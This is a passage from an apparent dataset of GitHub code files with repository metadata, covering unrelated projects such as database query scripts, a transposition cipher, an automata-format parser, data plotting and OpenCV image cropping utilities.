list(itertools.chain(*cursor.fetchall()))\n return algos\n\n\ndef get_release_time(cursor, backend, algo):\n print('######')\n print(backend)\n print(algo)\n print('#####')\n exec_string = \"select time, tag from perftest_2 where algo_comp = '{}' and exec='{}';\".format(algo, backend)\n print(exec_string)\n cursor.execute(exec_string)\n rows = cursor.fetchall()\n x = map(lambda x: x[1], rows)\n y = map(lambda x: float(x[0]), rows)\n return list(x), list(y)\n\ndef init_connection():\n DIR = os.getcwd()\n FILE = join('creds', 'login.json')\n PATH = join(DIR, FILE)\n login_info = config_reader(PATH)\n conn_string = \"host={} port={} dbname={} user={} password={}\".format(\n login_info['host'], login_info['port'], login_info['dbname'], login_info['user'], login_info['password'])\n conn = psycopg2.connect(conn_string)\n cursor = conn.cursor()\n return cursor\n\nif __name__ == '__main__':\n conn = init_connection()\n #backend = get_backends(conn)\n #algos = get_algos(conn)\n x, y = get_release_time(conn, 'singlenode', 'multinomial_data-gen_none_dense_10k_100')\n print(x)\n print(y)\n","repo_name":"krishnakalyan3/bokeh_example","sub_path":"systemml/conn_test.py","file_name":"conn_test.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71074579948","text":"\"\"\"\nAdmin stats handler\n\"\"\"\nimport requests\nfrom influxdb.client import InfluxDBClient\nfrom configs import config\nfrom app.handlers.base_handler import BaseHandlerWithAuth\nfrom app.handlers.statistic_helpers import prepare_params\nfrom crutches_on_wheels.errors.errors import Error\nfrom crutches_on_wheels.errors.exception import VLException\nfrom tzlocal import get_localzone\n\n_, IP, PORT = 
config.ADMIN_STATISTICS_SERVER_ORIGIN.split(':')\nIP = IP[2:]\ninfluxClient = InfluxDBClient(IP, database=config.ADMIN_STATISTICS_DB, port=int(PORT), timeout=60)\n\n\nclass RealtimeStatisticsHandler(BaseHandlerWithAuth):\n \"\"\"\n Admin stats handler.\n \"\"\"\n\n @BaseHandlerWithAuth.requestExceptionWrap\n def get(self, series: str) -> None:\n \"\"\"\n Search element by id or email.\n\n .. http:get:: /realtime_statistics/{series}\n\n\n :param series: extract_success|matching_success|errors\n :query resource: resource to get statistics about. Will be ignored if not set.\n (\"descriptors\", \"search\", \"match\", \"identify\", \"verify\")\n :query error: luna API error code to get statistics about\n :query aggregator: aggregation type (\"max\", \"min\", \"mean\", \"count\")\n :query count_faces: result count faces on photo\n :query limit: matching limit in match request\n :query template: template in match request. 1 - person, 0 - descriptor\n :query candidate: candidate in match request. 1 - dynamic list, 0 - static Luna API list\n\n :reqheader Authorization: basic authorization\n\n **Example response**:\n\n .. sourcecode:: http\n\n HTTP/1.1 200 Ok\n Vary: Accept\n Content-Type: application/json\n LUNA-Request-Id: 1516179740,d3abc2f6-70f1-4ae0-9d10-475103e0891d\n\n .. json:object:: stats result\n :showexample:\n\n :property name: The name of current series\n :proptype name: _enum_(extract_success)_(matching_success,errors)\n :property columns: Titles of cells in values' batches\n :property values: List of values' batches\n\n Message error is returned in format :json:object:`server_error`.\n\n :statuscode 200: success\n :statuscode 400: Bad query parameters\n :statuscode 500: internal server error\n \"\"\"\n\n paramsRes = prepare_params(self.get_query_argument, series)\n if paramsRes.fail:\n error = Error.generateError(paramsRes.error,\n paramsRes.value)\n raise VLException(error, 400, isCriticalError=False)\n params = paramsRes.value\n\n query = \"SELECT {aggregator}(*) FROM {series} WHERE {time__gte} < time AND time < {time__lt} {where} group by time({group_by}) fill(none)\".format(\n **params)\n try:\n res = influxClient.query(query + \" TZ('{}')\".format(get_localzone()))\n except requests.exceptions.ConnectionError:\n raise VLException(Error.InfluxConnectionTimeout, 500, False)\n\n return self.success(200, outputJson=res.raw['series'][0] if 'series' in res.raw else {})\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-admin/luna_admin/app/handlers/realtime_statistics.py","file_name":"realtime_statistics.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16668257707","text":"import random\n\n\ndef encode(input_bytes: bytearray, columns: str) -> bytearray:\n columns_count = len(columns)\n result = bytearray()\n while len(input_bytes) % columns_count != 0:\n input_bytes.extend(b'z')\n bytes_count = len(input_bytes)\n for column_iterator in range(1, columns_count + 1):\n index_of_next_column = columns.index(str(column_iterator)) + 1\n for bytes_iterator in range(index_of_next_column, bytes_count + 1, columns_count):\n resulting_byte = input_bytes[bytes_iterator - 1]\n result.append(resulting_byte)\n return result\n\n\n\"\"\"\n5147263\nabcdefg\nhijklmn\nopqrstu\nwxyzzzz\n\nbipx-elsz-gnuz-cjqy-ahow-fmtz-dkrz\nbipx-elsz-gnuz-cjqy-ahow-fmtz-dkrz')\n\n\"\"\"\n\n\ndef decode(input_bytes: bytearray, columns: str) -> bytes:\n columns_count = len(columns)\n rows_count = 
len(input_bytes) // columns_count\n rows_usage = [0 for _ in range(columns_count)]\n result = bytearray()\n for i in range(len(input_bytes)):\n current_column = int(columns[i % columns_count])\n bytes_before = (current_column - 1) * rows_count\n desired_byte = bytes_before + rows_usage[current_column - 1]\n result.append(input_bytes[desired_byte])\n rows_usage[current_column - 1] += 1\n return result\n\n\ndef make_padding(input_bytes: bytearray, columns: str):\n columns_count = len(columns)\n while len(input_bytes) % columns_count != 0:\n input_bytes.extend(b'z')\n\n\ndef validate_input(columns: str) -> bool:\n if not columns.isnumeric():\n return False\n return True\n\n\ndef main(input_filename: str,\n output_filename: str,\n columns: str,\n mode: str = \"encode\"):\n with open(input_filename, \"rb\") as file:\n input_bytes = bytearray(file.read())\n if mode == \"encode\":\n make_padding(input_bytes, columns)\n output_bytes = encode(input_bytes, columns)\n elif mode == \"decode\":\n output_bytes = decode(input_bytes, columns)\n else:\n output_bytes = b''\n with open(output_filename, \"wb\") as file:\n file.write(output_bytes)\n\n\ndef assertion(string: str, columns: str):\n input_bytes = bytearray(string, \"utf-8\")\n make_padding(input_bytes, columns)\n encoded_bytes = encode(input_bytes, columns)\n decoded_bytes = decode(encoded_bytes, columns)\n actual = decoded_bytes.decode(\"utf-8\")\n assert actual[:len(string)] == string, f\"actual and expected differ: expected {string}, but decoded {actual}\"\n\n\ndef debug(tests_count: int = 1000):\n string = \"1234567890-=!@#$%^&*()_+qwertyuiop[]asdfghjkl;'zxcvbnm,./QWERTYUIOP{}ASDFGHJKL:\\\"ZXCVBNM<>?~`\\\\\"\n for i in range(tests_count):\n columns_count = random.randint(1, 9)\n string_length = random.randint(1, 100)\n string = \"\".join([random.choice(string) for _ in range(string_length)])\n columns_array = []\n for j in range(1, columns_count + 1):\n columns_array.append(str(j))\n random.shuffle(columns_array)\n columns = \"\".join(columns_array)\n assertion(string, columns)\n\n\nif __name__ == \"__main__\":\n main(\"encoded.txt\", \"decode.txt\", '5147263', \"decode\")\n # try:\n # debug()\n # except AssertionError as e:\n # print(e)\n","repo_name":"stryukovsky/InfoProtection1","sub_path":"third_task.py","file_name":"third_task.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74958741547","text":"import requests\nimport csv\nimport json\nimport os\n\nfilename = './水利資料整合雲平台.csv'\n\ntry:\n with open(filename, 'r', encoding='utf-8-sig') as csvfile:\n reader = csv.DictReader(csvfile)\n for row in reader:\n print(row)\n api_url = row['API網址']\n frequency = row['更新頻率']\n if frequency == '不定期:上傳機關依據現場狀況進行上傳週期調整':\n frequency = '不定期'\n title = row['資料標題']\n response = requests.get(api_url)\n data = response.json()\n filename = f'C:/Users/PC/Desktop/AI大數據人才養成/集先鋒/test/data/({frequency}){title}.json'\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'w', encoding='utf-8') as jsonfile:\n json.dump(data, jsonfile, ensure_ascii=False, indent=4)\n print(f'已寫入{filename}')\nexcept Exception as e:\n print(f\"Error reading CSV file: {e}\")","repo_name":"super0selina/API_Water-Resources-Agency","sub_path":"data_水利資料整合平台/insert_data.py","file_name":"insert_data.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"24850931048","text":"'''\nWRITING T0 A FILE\n-------------------\nWhen you write to a file, the output will still be avilable after you close the terminal\ncontaining your program's output. \n\nWriting to an Empty File:\n-------------------------\nTo write text to a file, you need to call open() with a second argument telling\nPython that you want to write to the file. \n'''\n\nfilename = 'programming.txt'\n\n'''\nwith open(filename, 'w') as file_object:\n file_object.write(\"This is all mundane.\")\n'''\n\n'''\nThe call to open() in this example has two arguments. The first argument is still the name\nof the file we want to open. The 2nd arg, 'w' tells Python that we want to open the file\nin 'write mode'. \n\nYou can open a file in 'read mode' ('r'), write mode ('w'), append mode ('a'), or a mode\nthat allows you to read and write to the file ('r+'). \nIf you omit the mode arg, Python opens the file in read-only mode by default. \n\nThe open() function automatically creates the file you're writing to if it doesn't already exist. \nHowever, be careful opening a file in write mode ('w') b/c if the file does exist, Python\nwill erase the contents of the file before returning the file object. \n\n\nWRITING MULTIPLE LINES:\n------------------------\nThe write() function doesn't add any newlines to the text we write. So if you write\nmore than one line without including newline characters, your file may not look the way you \nwant it to:\n\n\nAPPENDING TO A FILE:\n-------------------\nIf you want to add content to a file instead of writing over exisiting content, \nyou can open the file in append mode. When you open a file in append mode, \nPython doesn't erase the contents of the file before returning the file object. \n'''\n\nwith open(filename, 'a') as file_object:\n file_object.write(\"The sun explodes into tiny fragements that \\n\")\n file_object.write(\"will nourish the surronding stars within the galaxy.\\n\")","repo_name":"CodeSoju/PythonCrashCourse","sub_path":"Chapter10/writing_to_file.py","file_name":"writing_to_file.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21952681943","text":"from app.database import db\nfrom .models import Todo\n\n\nclass SqlaRepo:\n def __init__(self):\n pass\n\n @staticmethod\n def _create_todo_objects(results):\n return [\n Todo(\n id=q.id,\n title=q.title,\n is_done=q.is_done,\n created_at=q.created_at\n )\n for q in results\n ]\n\n def list(self, filters=None):\n session = db.session\n query = session.query(Todo)\n\n return self._create_todo_objects(query.all())\n","repo_name":"yoophi/api-template-base","sub_path":"app/repository/sqla/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36326411956","text":"def intersect(X1, X2, Y1, Y2, Z1, Z2, x1, x2, y1, y2, z1, z2):\n if x1 <= X2 and x2 >= X1:\n if y1 <= Y2 and y2 >= Y1:\n if z1 <= Z2 and z2 >= Z1:\n return True\n \n return False\n \n \ndef volume(x1, x2, y1, y2, z1, z2):\n return (x2 - x1 + 1) * (y2 - y1 + 1) * (z2 - z1 + 1)\n\n\ncount = 0\ncuboids = []\nwith open('input.txt') as f:\n for line in f.readlines():\n line = line.strip()\n state, coords = line.split()\n X, Y, Z = coords.split(',')\n X1, X2 = map(int, X.split('=')[-1].split('..'))\n Y1, Y2 = map(int, Y.split('=')[-1].split('..'))\n Z1, Z2 = map(int, Z.split('=')[-1].split('..'))\n \n 
for cub in reversed(cuboids):\n if intersect(X1, X2, Y1, Y2, Z1, Z2, *cub):\n x1, x2, y1, y2, z1, z2 = cub\n \n xs = [x for x in [x1, X1 - 1, X1, X2, X2 + 1, x2] if x1 <= x <= x2]\n ys = [y for y in [y1, Y1 - 1, Y1, Y2, Y2 + 1, y2] if y1 <= y <= y2]\n zs = [z for z in [z1, Z1 - 1, Z1, Z2, Z2 + 1, z2] if z1 <= z <= z2]\n if len(xs) == 3:\n xs = [xs[0], xs[1], xs[1] + 1, xs[2]]\n if len(ys) == 3:\n ys = [ys[0], ys[1], ys[1] + 1, ys[2]]\n if len(zs) == 3:\n zs = [zs[0], zs[1], zs[1] + 1, zs[2]]\n \n for i in range(0, len(xs) - 1, 2):\n for j in range(0, len(ys) - 1, 2):\n for k in range(0, len(zs) - 1, 2):\n c = (xs[i], xs[i + 1], ys[j], ys[j + 1], zs[k], zs[k + 1])\n vol = volume(*c)\n if vol > 0 and not intersect(X1, X2, Y1, Y2, Z1, Z2, *c):\n cuboids.append(c)\n count += vol\n\n count -= volume(*cub)\n cuboids.remove(cub)\n\n if state == 'on':\n cuboids.append((X1, X2, Y1, Y2, Z1, Z2))\n count += volume(X1, X2, Y1, Y2, Z1, Z2)\n\nfor a in cuboids:\n for b in cuboids:\n if a != b and intersect(*a, *b):\n print('error')\n \nprint(count)\n","repo_name":"Panurb/aoc2021","sub_path":"22/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14241215898","text":"from copy import copy\nfrom sys import path\n\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport matplotlib.image as image\nimport numpy as np\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\npath.extend([path[0][:path[0].rindex(\"src\") - 1]])\nfrom bin.Coordinators.gym_coordinator import Coordinator\nfrom bin.Environment.simple_env import Env\n\n_z = np.flipud(image.imread(\"C:/Docs/ETSI/BO_drones/data/Map/Ypacarai/map.png\"))[:, :, 0]\nnans = np.fliplr(np.asarray(np.where(_z == 1)).reshape(2, -1).T)\n\n\ndef get_clean(_file):\n # return _file\n for nnan in nans:\n _file[nnan[1], nnan[0]] = -1\n return np.ma.array(_file, mask=(_file == -1))\n\n\n_bo_xs = np.array([[563, 375],\n # [559, 410],\n [604, 368],\n [647, 327],\n # [704, 362],\n # [690, 430],\n [671, 504],\n # [676, 581],\n # [649, 650],\n # [611, 716],\n # [593, 793],\n # [584, 873],\n # [498, 888],\n # [416, 915],\n # [331, 936],\n # [245, 953],\n # [214, 1023],\n # [259, 958],\n # [276, 1033],\n # [293, 1108],\n # [331, 1039],\n # [334, 1046]\n ])\n\nsensors = {\"s5\", \"s6\"}\nenvironment = Env(map_path2yaml=path[-1] + \"/data/Map/Ypacarai/map.yaml\")\nenvironment.add_new_map(sensors, file=0, clone4noiseless=False)\ncoordinator = Coordinator(environment.grid, sensors)\n\npos = _bo_xs[0, :]\ni_pos = pos\n_bo_xs = _bo_xs[1:, :]\nread = [{\"pos\": pos, \"s5\": environment.maps[\"s5\"][pos[1], pos[0]], \"s6\": environment.maps[\"s6\"][pos[1], pos[0]]}]\n\nxticks = np.arange(0, 1000, 200)\nyticks = np.arange(0, 1500, 200)\nxnticks = [str(format(num * 10, \",\")) for num in xticks]\nynticks = [str(format(num * 10, \",\")) for num in yticks]\n\ncoordinator.initialize_data_gpr(read)\nfor pos in _bo_xs:\n read = {\"pos\": pos, \"s5\": environment.maps[\"s5\"][pos[1], pos[0]], \"s6\": environment.maps[\"s6\"][pos[1], pos[0]]}\n coordinator.add_data(read)\n coordinator.fit_data()\n\nfig, axs = plt.subplots(1, 2) # 4 axs\ncurrent_cmap = copy(cm.get_cmap(\"jet\"))\ncurrent_cmap.set_bad(color=\"#eaeaf200\")\ncurrent_cmap2 = copy(cm.get_cmap(\"cividis\"))\ncurrent_cmap2.set_bad(color=\"#eaeaf200\")\n\ntuples = coordinator.surrogate(_x=coordinator.all_vector_pos,\n return_std=True) # vector de 2 componentes, cada comp 2 imgs\n_map = 
environment.maps[\"s5\"][~np.isnan(environment.maps[\"s5\"])]\n\nfrom bin.Utils.acquisition_functions import gaussian_ei as ei\n\n# print(bic(_map, get_clean(tuples[1][0].reshape((1000, 1500)).T)[~np.isnan(environment.maps[\"s5\"])], len(_bo_xs)))\ntu = [[], [], [], []]\nacq1 = ei(coordinator.all_vector_pos, tuples[0])\nacq2 = ei(coordinator.all_vector_pos, tuples[1])\ntu[0] = get_clean(acq1.reshape((1000, 1500)).T)\ntu[1] = get_clean(acq2.reshape((1000, 1500)).T)\n# tu[0] = np.power(environment.maps[\"s5\"] - get_clean(tuples[0][0].reshape((1000, 1500)).T), 2)\n# tu[1] = np.power(environment.maps[\"s6\"] - get_clean(tuples[1][0].reshape((1000, 1500)).T), 2)\n# tu[2] = get_clean(tuples[0][1].reshape((1000, 1500)).T)\n# tu[3] = get_clean(tuples[1][1].reshape((1000, 1500)).T)\n\n# auxmin1 = np.nanmin(tu[0])\n# auxmin2 = np.nanmin(tu[1])\n# vmin1 = min(auxmin1, auxmin2)\n# auxmax1 = np.nanmax(tu[0])\n# auxmax2 = np.nanmax(tu[1])\n# vmax1 = max(auxmax1, auxmax2)\n# auxmin3 = np.nanmin(tu[2])\n# auxmin4 = np.nanmin(tu[3])\n# vmin2 = min(auxmin3, auxmin4)\n# auxmax3 = np.nanmax(tu[2])\n# auxmax4 = np.nanmax(tu[3])\n# vmax2 = max(auxmax3, auxmax4)\n\nfor ax, ts in zip(axs, enumerate(tu)):\n if ts[0] < 2:\n aux = ax.imshow(ts[1], origin='lower', zorder=5, cmap=current_cmap)\n else:\n aux = ax.imshow(ts[1], origin='lower', zorder=5, cmap=current_cmap2)\n ax.plot(_bo_xs[:, 0], _bo_xs[:, 1], '^y', zorder=10)\n ax.plot(i_pos[0], i_pos[1], '^y', zorder=10)\n CS = ax.contour(ts[1], colors='k', alpha=0.6, linewidths=1.3, zorder=10)\n divider = make_axes_locatable(ax)\n cax = divider.append_axes('right', size='5%', pad=0.05)\n fig.colorbar(aux, cax=cax, orientation='vertical')\n ax.grid(True, zorder=0, color=\"white\")\n ax.clabel(CS, inline=1, fontsize=12)\n ax.set_facecolor('#eaeaf2')\n ax.set_xlabel(\"x (m)\", fontsize=17)\n ax.set_xticks(xticks)\n ax.set_xticklabels(xnticks, fontsize=17)\n ax.set_yticks(yticks)\n ax.set_yticklabels(ynticks, fontsize=0)\n if ts[0] == 0:\n ax.set_title(\"$\\\\alpha_1(x)$\")\n elif ts[0] == 1:\n ax.set_title(\"$\\\\alpha_2(x)$\")\n elif ts[0] == 2:\n ax.set_title(\"$\\\\sigma_1(x)$\")\n else:\n ax.set_title(\"$\\\\sigma_2(x)$\")\nplt.sca(axs[0])\nplt.yticks(yticks, labels=ynticks, fontsize=17)\nplt.ylabel(\"y (m)\", fontsize=17)\nplt.show(block=True)\n","repo_name":"PeraltaFede/BO_drones","sub_path":"src/Results/plot_maps_malaga.py","file_name":"plot_maps_malaga.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28898601041","text":"class Fraction:\n def __init__(self, numerator, denominator):\n self._numerator = numerator\n self._denominator = denominator\n \n @staticmethod\n def GCD(m, n):\n while(n != 0):\n t = n\n n = m % n\n m = t\n return m\n \n def reduce(self):\n if(self._denominator == 0):\n raise (ZeroDivisionError(\"Denominator != 0\"))\n gcd = self.GCD(self._numerator, self._denominator)\n \n return self._numerator // gcd, self._denominator // gcd","repo_name":"YeDongVibe/AI_Programming_Class","sub_path":"P.Park/frccl.py","file_name":"frccl.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39585524500","text":"# -*-coding:utf-8 -*-\n\"\"\"\n@Author: zhangyi\n@Time: 2021/7/26 3:47 下午\n@File: examle.py\n@IDE: PyCharm\n\"\"\"\nimport pandas as pd\nfrom OperateExcel import OperateExcel\nfrom Tools import fileExsits\n\nif __name__ == '__main__':\n\n\t# def 
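A short usage check for the Fraction class above; the expected values follow directly from the Euclidean GCD loop:

f = Fraction(8, 12)
print(Fraction.GCD(8, 12)) # -> 4
print(f.reduce()) # -> (2, 3)

import math
assert math.gcd(8, 12) == 4 # the standard-library equivalent of Fraction.GCD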
main():\n\t# \top = OperateExcel()\n\t# \top.setSheetName(\"哈哈哈\")\n\t# \top.setExcelDirFileName(\"excelData/aaa.xlsx\")\n\t# \tdata = [['a','b']]\n\t# \top.setExcelColumns(['标题列1','标题列2'])\n\t# \top.setExcelData(data)\n\t# \top.addExcelSheetWrite()\n\tdef main():\n\t\top = OperateExcel()\n\t\tcolumns=['col 1', 'col 2']\n\t\top.setExcelColumns(columns)\n\t\tdata = [['a', 'b'], ['c', 'd']]\n\t\top.setSheetName(\"孩子\")\n\t\top.setExcelData(data)\n\t\top.pdLineListWrite()\n\tmain()\n\t# \"\"\"\n\t# 按照列进行写入\n\t# \"\"\"\n\t# def test3():\n\t# \top = OperateExcel()\n\t# \tdata = {'标题列1': ['张三','李四'],\n\t# \t\t\t'标题列2': [80, 90]\n\t# \t\t\t}\n\t# \top.setSheetName(\"孩子\")\n\t# \top.setExcelData(data)\n\t# \top.pdColumnDictWrite()\n\t# test3()\n\t# \"\"\"\n\t# 按照行追加写入\n\t# \"\"\"\n\t# def test4():\n\t# \top = OperateExcel()\n\t# \tdata = [['a','b']]\n\t# \top.setSheetName(\"孩子\")\n\t# \top.setExcelHeaders(True)\n\t# \top.setExcelColumns(['标题列1','标题列2'])\n\t# \top.setExcelData(data)\n\t# \top.pdAppendListWrite()\n\t#\n\t# test4()\n\t# \"\"\"\n\t# 读取excel\n\t# \"\"\"\n\t# def test5():\n\t# \top = OperateExcel()\n\t# \td = op.readExcelFileName()\n\t# \tprint(type(d))\n\t# test5()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"gongzhuweizi/generalTools","sub_path":" OperateExcel/examle.py","file_name":"examle.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16175546544","text":"#!/usr/bin/env python3\nimport re\nimport sys\n\nfrom enum import Enum\n\n###########################################\ndef serialize_token(token):\n '''serialize_token(token) -> str\n\nSerializes the token (including adding necessary escape sequences).\n'''\n result = ''\n if isinstance(token, tuple):\n # return '(' + ' '.join([serialize_token(item) for item in token]) + ')'\n return ' '.join([serialize_token(item) for item in token])\n if re.search('[\"# \\t]', token):\n result += '\"'\n for ch in token:\n if ch == '\"':\n result += '\\\\' + ch\n else:\n result += ch\n\n result += '\"'\n else:\n result += token\n\n return result\n\n##########################################\n# TODO: only parses a single segment in a file\n\n\n###########################################\nclass ParsedVTF:\n '''ParsedVTF\n\nResult of a VTF format parser.\n'''\n def __init__(self):\n self.type = ''\n self.dict = { }\n self.body = []\n\n def __str__(self):\n return self.serialize()\n\n def serialize(self):\n result = '@' + self.type + '\\n'\n for k,v in self.dict.items():\n result += '%' + k\n\n for item in v:\n result += ' ' + serialize_token(item)\n\n result += '\\n'\n\n result += '\\n'\n for line in self.body:\n result += ' '.join([serialize_token(item) for item in line])\n result += '\\n'\n\n return result\n\n\n###############################\ndef tokenize(line):\n assert line\n assert line == line.strip()\n # TODO: fix this\n\n class ParserState(Enum):\n INIT = 0,\n UNQUOTED = 1,\n QUOTED = 2,\n QUOTED_ESCAPE = 3\n\n state = ParserState.INIT\n token_list = []\n token = ''\n for ch in line:\n if state == ParserState.INIT:\n if ch in { ' ', '\\t'}:\n continue\n elif ch == '(':\n token_list.append(ch)\n continue;\n elif ch == '\"':\n state = ParserState.QUOTED\n continue\n elif ch == '#':\n break\n else:\n token += ch\n state = ParserState.UNQUOTED\n continue\n elif state == ParserState.UNQUOTED:\n if ch in { ' ', '\\t', '#' }:\n token_list.append(token)\n token = ''\n if ch == '#':\n break\n else:\n state = ParserState.INIT\n continue\n elif ch == 
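OperateExcel in examle.py above is a project-specific wrapper; a minimal pandas-only sketch of the same row-wise write (file and sheet names are placeholders, and openpyxl must be installed for .xlsx output):

import pandas as pd

columns = ['col 1', 'col 2']
data = [['a', 'b'], ['c', 'd']]
pd.DataFrame(data, columns=columns).to_excel('demo.xlsx', sheet_name='Sheet1', index=False)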
'\"':\n raise Exception(\"Invalid format: \" + line)\n else:\n token += ch\n continue\n elif state == ParserState.QUOTED:\n if ch == '\\\\':\n state = ParserState.QUOTED_ESCAPE\n continue\n elif ch == '\"':\n token_list.append(token)\n token = ''\n state = ParserState.INIT\n continue\n else:\n token += ch\n elif state == ParserState.QUOTED_ESCAPE:\n if ch == '\"':\n token += ch;\n else:\n token += '\\\\' + ch\n\n state = ParserState.QUOTED\n continue\n else:\n assert \"Invalid parser state: \" + str(state)\n\n if state in { ParserState.QUOTED, ParserState.QUOTED_ESCAPE }:\n raise Exception(\"Missing end of quotes \" + line)\n\n if token:\n token_list.append(token)\n\n return token_list\n\n###############################\ndef getline(fd):\n '''getline(fd) -> [str]\n\nReads a line from the file descriptor 'fd' and parses it into an array of tokens.\n'''\n while True:\n line = fd.readline()\n if not line:\n return None\n\n while line.endswith('\\\\\\n'):\n line = line[:-2]\n newline = fd.readline()\n if not newline:\n raise Exception('Cannot continue beyond the end of file')\n line += newline\n\n line = line.strip()\n if not line:\n # empty string\n continue\n\n if re.match(\"^#\", line) is not None:\n # whole-line comments\n continue\n\n return tokenize(line)\n\n###########################################\ndef parsevtf(fd):\n '''parsevtf(fd) -> ParsedVTF\n\nParses the input from the file descriptor 'fd'.\n'''\n result = ParsedVTF()\n\n type_parsed = False\n while True:\n line = getline(fd)\n if not line:\n # end of file\n break\n\n if line[0][0] == '@':\n if type_parsed:\n raise Exception('Type already parsed before: \"' + \\\n result.type + '\"; new type: ' + line[0][1:])\n if len(line) > 1 or len(line[0]) == 1:\n raise Exception('Invalid type: ' + line)\n\n result.type = line[0][1:]\n type_parsed = True\n\n elif line[0][0] == '%':\n if len(line[0]) == 1:\n raise Exception(\"Invalid key: \" + line)\n\n key = line[0][1:]\n\n if (key in result.dict):\n result.dict[key].extend(line[1:])\n else:\n result.dict[key] = line[1:]\n else:\n result.body.append(line)\n\n if not type_parsed:\n raise Exception(\"Could not find a @TYPE directive\")\n\n return result\n\n\n##########################\nif __name__ == '__main__':\n argc = len(sys.argv)\n if argc == 1:\n fd = sys.stdin\n elif argc == 2:\n fd = open(sys.argv[1], \"r\")\n else:\n print(\"Invalid number of arguments: either 0 or 1 required\")\n sys.exit(1)\n\n parsed_aut = parsevtf(fd)\n print(parsed_aut)\n\n if argc == 2:\n fd.close()\n","repo_name":"ondrik/automata-benchmarks","sub_path":"vtf/util/VTFParser.py","file_name":"VTFParser.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"31509837740","text":"import cv2\nimport numpy as np\nimport os\nimport re\nimport uuid\nrandom_name = uuid.uuid1()\n\ndef four_point_transform(image, pts):\n \"\"\"\n Функция вырезает необходимую область независимо от ориентации избражения\n :param image: изображение в виде numpy массива\n :param pts: контуры изображения, которое надо трансформировать\n :return: вырезанная область в правильной ориентации\n \"\"\"\n rect = order_points(pts) # координаты контуров\n (tl, tr, br, bl) = rect\n\n # вычисление максимального расстояния(по ширине)\n # между нижней правой и нижней левой координатой, верхними координатоми\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = 
max(int(widthA), int(widthB))\n # вычисление по высоте аналогично\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n\n # координаты итогового изображения\n dst = np.array(\n [[0, 0], [maxWidth - 1, 0], [maxWidth - 1, maxHeight - 1], [0, maxHeight - 1]],\n dtype=\"float32\",\n )\n\n M = cv2.getPerspectiveTransform(rect, dst) # создание матрицы для преобразованного изобр.\n warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight)) # преобразованное изображение\n return warped\n\n\ndef order_points(pts):\n \"\"\"\n Функция нужна для упорядочения координат:\n координаты должны идти в след. порядке [левая верхняя, правая верхняя, правая нижняя, левая нижняя]\n :param pts: numpy массив с четырьмя точками в виде (x, y)\n :return: numpy массив с четырьмя точками в правильном порядке\n \"\"\"\n src_pts = np.zeros((4, 2), dtype=\"float32\")\n # print(pts)\n s = np.sum(pts, axis=1)\n src_pts[0] = pts[np.argmin(s)]\n src_pts[2] = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis=1)\n src_pts[1] = pts[np.argmin(diff)]\n src_pts[3] = pts[np.argmax(diff)]\n return src_pts\n\n\ndef remove(tables, errors, bonus_box):\n \"\"\"\n Функция удаляет все изображения .jpg из директорий:\n :param tables: путь к директории, в которой хранятся вырезанные таблицы\n :param errors: путь к директории, в которой хранятся нераспознанные документы\n :param bonus_box: путь к директории, в которой хранятся вырезанные боксы с бонусами\n \"\"\"\n fds = os.listdir(tables)\n fds1 = os.listdir(errors)\n fds2 = os.listdir(bonus_box)\n\n for img in fds:\n if re.search(\".jpg\", img):\n try:\n os.remove(os.path.join(tables, img))\n except Exception as e:\n print(e)\n\n for image in fds1:\n if re.search(\".jpg\", image):\n try:\n os.remove(os.path.join(errors, image))\n except Exception as e:\n print(e)\n\n for im in fds2:\n if re.search(\".jpg\", im):\n try:\n os.remove(os.path.join(bonus_box, im))\n except Exception as e:\n print(e)\n\n\ndef filtration(path, a):\n \"\"\"\n Функция отфильтровывает изображения в директории по параметрам высоты и ширины: не валидные переименовываются\n :param path: путь к директории, в которой необходимо фильтровать изображения\n \"\"\"\n i = 0\n fds2 = os.listdir(path)\n\n for img in fds2:\n if re.search(\"box\", img):\n try:\n image = cv2.imread(os.path.join(path, img))\n if image.shape[0] > 50 or image.shape[0] < 40: # параметры высоты изображения, image.shape = тип tuple\n os.remove(os.path.join(path, img))\n i += 1\n\n\n except Exception as e:\n print(e)\n\n if re.search('work_', img):\n try:\n image = cv2.imread(os.path.join(path, img))\n if image.shape[0] > 50 or image.shape[0] < 